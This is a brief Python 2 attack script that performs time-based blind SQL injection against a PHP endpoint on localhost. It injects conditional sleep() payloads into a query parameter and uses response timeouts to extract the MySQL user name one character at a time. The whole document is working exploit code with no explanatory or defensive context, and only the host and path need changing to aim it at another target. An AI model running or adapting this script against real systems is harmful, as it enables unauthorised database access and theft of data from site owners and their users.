#encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7', 'Accept-Language':'zh-cn,zh;q=0.5', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Keep-Alive':'115', 'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.14) Gecko/20110221 Ubuntu/10.10 (maverick) Firefox/3.6.14'} payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime()) user = '' for i in range(1, 21): for payload in payloads: try: s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) s = " and (if(%s,sleep(3),0))#" % s conn = httplib.HTTPConnection('127.0.0.1', timeout=3) conn.request(method='GET', url="/sql.php?cmd=1%s" % urllib.quote(s),headers=header) conn.getresponse() conn.close() # print '.', except Exception,e: # print e user += payload print ' [surprise]:', user, time.sleep(3.0) break print ' [Done] MySQL user is %s' % user